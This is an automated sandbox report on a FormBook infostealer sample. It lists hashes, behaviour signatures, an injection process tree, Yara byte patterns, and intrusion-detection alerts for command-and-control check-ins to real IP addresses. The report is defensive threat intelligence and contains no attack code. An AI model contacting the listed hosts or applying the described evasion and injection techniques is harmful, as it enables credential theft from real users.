Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p4rsJEIb7k.exe

Overview

General Information

Sample name:p4rsJEIb7k.exe
Analysis ID:1549358
MD5:159afc06a66a86f332be92f52963b09e
SHA1:0cb60fe78cad1919e4c1ef5d315752e9147a7792
SHA256:64b147e7c878171760935be6fde4ba79aedf2e045e78ad8a4eaf235ce60f6fdf
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • p4rsJEIb7k.exe (PID: 4816 cmdline: "C:\Users\user\Desktop\p4rsJEIb7k.exe" MD5: 159AFC06A66A86F332BE92F52963B09E)
    • svchost.exe (PID: 3088 cmdline: "C:\Users\user\Desktop\p4rsJEIb7k.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • BlltrVxNMs.exe (PID: 4732 cmdline: "C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msiexec.exe (PID: 6748 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • firefox.exe (PID: 7304 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f0e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13edf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ParentImage: C:\Users\user\Desktop\p4rsJEIb7k.exe, ParentProcessId: 4816, ParentProcessName: p4rsJEIb7k.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ProcessId: 3088, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ParentImage: C:\Users\user\Desktop\p4rsJEIb7k.exe, ParentProcessId: 4816, ParentProcessName: p4rsJEIb7k.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ProcessId: 3088, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:32:44.165921+010028554641A Network Trojan was detected192.168.11.204978413.248.169.4880TCP
            2024-11-05T15:32:44.165921+010028554641A Network Trojan was detected192.168.11.204977650.19.214.22780TCP
            2024-11-05T15:32:44.165921+010028554641A Network Trojan was detected192.168.11.204978013.248.169.4880TCP
            2024-11-05T15:34:08.941947+010028554641A Network Trojan was detected192.168.11.204974266.198.240.1580TCP
            2024-11-05T15:34:11.580511+010028554641A Network Trojan was detected192.168.11.204974366.198.240.1580TCP
            2024-11-05T15:34:14.253474+010028554641A Network Trojan was detected192.168.11.204974466.198.240.1580TCP
            2024-11-05T15:34:23.592824+010028554641A Network Trojan was detected192.168.11.20497463.33.130.19080TCP
            2024-11-05T15:34:24.837039+010028554641A Network Trojan was detected192.168.11.20497473.33.130.19080TCP
            2024-11-05T15:34:27.476841+010028554641A Network Trojan was detected192.168.11.20497483.33.130.19080TCP
            2024-11-05T15:34:35.855883+010028554641A Network Trojan was detected192.168.11.2049750161.97.142.14480TCP
            2024-11-05T15:34:38.588553+010028554641A Network Trojan was detected192.168.11.2049751161.97.142.14480TCP
            2024-11-05T15:34:41.309600+010028554641A Network Trojan was detected192.168.11.2049752161.97.142.14480TCP
            2024-11-05T15:34:50.887348+010028554641A Network Trojan was detected192.168.11.2049754119.18.54.2780TCP
            2024-11-05T15:34:53.830801+010028554641A Network Trojan was detected192.168.11.2049755119.18.54.2780TCP
            2024-11-05T15:34:56.767004+010028554641A Network Trojan was detected192.168.11.2049756119.18.54.2780TCP
            2024-11-05T15:35:13.774587+010028554641A Network Trojan was detected192.168.11.2049758195.110.124.13380TCP
            2024-11-05T15:35:16.505439+010028554641A Network Trojan was detected192.168.11.2049759195.110.124.13380TCP
            2024-11-05T15:35:19.245333+010028554641A Network Trojan was detected192.168.11.2049760195.110.124.13380TCP
            2024-11-05T15:35:27.504676+010028554641A Network Trojan was detected192.168.11.2049762203.161.41.20480TCP
            2024-11-05T15:35:30.186171+010028554641A Network Trojan was detected192.168.11.2049763203.161.41.20480TCP
            2024-11-05T15:35:32.899013+010028554641A Network Trojan was detected192.168.11.2049764203.161.41.20480TCP
            2024-11-05T15:35:41.092159+010028554641A Network Trojan was detected192.168.11.204976668.65.122.22280TCP
            2024-11-05T15:35:43.804362+010028554641A Network Trojan was detected192.168.11.204976768.65.122.22280TCP
            2024-11-05T15:35:46.535572+010028554641A Network Trojan was detected192.168.11.204976868.65.122.22280TCP
            2024-11-05T15:35:55.809116+010028554641A Network Trojan was detected192.168.11.204977045.150.55.1580TCP
            2024-11-05T15:35:58.640786+010028554641A Network Trojan was detected192.168.11.204977145.150.55.1580TCP
            2024-11-05T15:36:01.490476+010028554641A Network Trojan was detected192.168.11.204977245.150.55.1580TCP
            2024-11-05T15:36:09.772169+010028554641A Network Trojan was detected192.168.11.204977450.19.214.22780TCP
            2024-11-05T15:36:12.409312+010028554641A Network Trojan was detected192.168.11.204977550.19.214.22780TCP
            2024-11-05T15:36:23.036417+010028554641A Network Trojan was detected192.168.11.204977813.248.169.4880TCP
            2024-11-05T15:36:25.655112+010028554641A Network Trojan was detected192.168.11.204977913.248.169.4880TCP
            2024-11-05T15:36:44.482485+010028554641A Network Trojan was detected192.168.11.204978213.248.169.4880TCP
            2024-11-05T15:36:47.121639+010028554641A Network Trojan was detected192.168.11.204978313.248.169.4880TCP
            2024-11-05T15:37:08.338105+010028554641A Network Trojan was detected192.168.11.204978615.197.148.3380TCP
            2024-11-05T15:37:09.581393+010028554641A Network Trojan was detected192.168.11.204978715.197.148.3380TCP
            2024-11-05T15:37:12.223040+010028554641A Network Trojan was detected192.168.11.204978815.197.148.3380TCP
            2024-11-05T15:37:29.149397+010028554641A Network Trojan was detected192.168.11.204979166.198.240.1580TCP
            2024-11-05T15:37:31.810088+010028554641A Network Trojan was detected192.168.11.204979266.198.240.1580TCP
            2024-11-05T15:37:34.473216+010028554641A Network Trojan was detected192.168.11.204979366.198.240.1580TCP
            2024-11-05T15:37:43.210516+010028554641A Network Trojan was detected192.168.11.20497953.33.130.19080TCP
            2024-11-05T15:37:44.932497+010028554641A Network Trojan was detected192.168.11.20497963.33.130.19080TCP
            2024-11-05T15:37:48.476833+010028554641A Network Trojan was detected192.168.11.20497973.33.130.19080TCP
            2024-11-05T15:37:55.603118+010028554641A Network Trojan was detected192.168.11.2049799161.97.142.14480TCP
            2024-11-05T15:37:58.325732+010028554641A Network Trojan was detected192.168.11.2049800161.97.142.14480TCP
            2024-11-05T15:38:01.041140+010028554641A Network Trojan was detected192.168.11.2049801161.97.142.14480TCP
            2024-11-05T15:38:09.702925+010028554641A Network Trojan was detected192.168.11.2049803119.18.54.2780TCP
            2024-11-05T15:38:12.662197+010028554641A Network Trojan was detected192.168.11.2049804119.18.54.2780TCP
            2024-11-05T15:38:15.603651+010028554641A Network Trojan was detected192.168.11.2049805119.18.54.2780TCP
            2024-11-05T15:38:32.210487+010028554641A Network Trojan was detected192.168.11.2049807195.110.124.13380TCP
            2024-11-05T15:38:34.973478+010028554641A Network Trojan was detected192.168.11.2049808195.110.124.13380TCP
            2024-11-05T15:38:37.704461+010028554641A Network Trojan was detected192.168.11.2049809195.110.124.13380TCP
            2024-11-05T15:38:45.871561+010028554641A Network Trojan was detected192.168.11.2049811203.161.41.20480TCP
            2024-11-05T15:38:48.576607+010028554641A Network Trojan was detected192.168.11.2049812203.161.41.20480TCP
            2024-11-05T15:38:51.290785+010028554641A Network Trojan was detected192.168.11.2049813203.161.41.20480TCP
            2024-11-05T15:38:59.383238+010028554641A Network Trojan was detected192.168.11.204981568.65.122.22280TCP
            2024-11-05T15:39:02.104820+010028554641A Network Trojan was detected192.168.11.204981668.65.122.22280TCP
            2024-11-05T15:39:04.831001+010028554641A Network Trojan was detected192.168.11.204981768.65.122.22280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: p4rsJEIb7k.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: p4rsJEIb7k.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: p4rsJEIb7k.exeJoe Sandbox ML: detected
            Source: p4rsJEIb7k.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BlltrVxNMs.exe, 00000002.00000000.4736161942.0000000000ABE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044BD29 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00475FE5
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044BF8D FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi1_2_00418943
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor esi, esi1_2_004183C4
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 4x nop then pop edi2_2_015BDC23
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 4x nop then xor eax, eax2_2_015C1794
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 4x nop then pop edi2_2_05382343
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov ebx, 00000004h3_2_054C04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 68.65.122.222:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 66.198.240.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 68.65.122.222:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 66.198.240.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 68.65.122.222:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 66.198.240.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 68.65.122.222:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 50.19.214.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 66.198.240.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 50.19.214.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 68.65.122.222:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 161.97.142.144:80
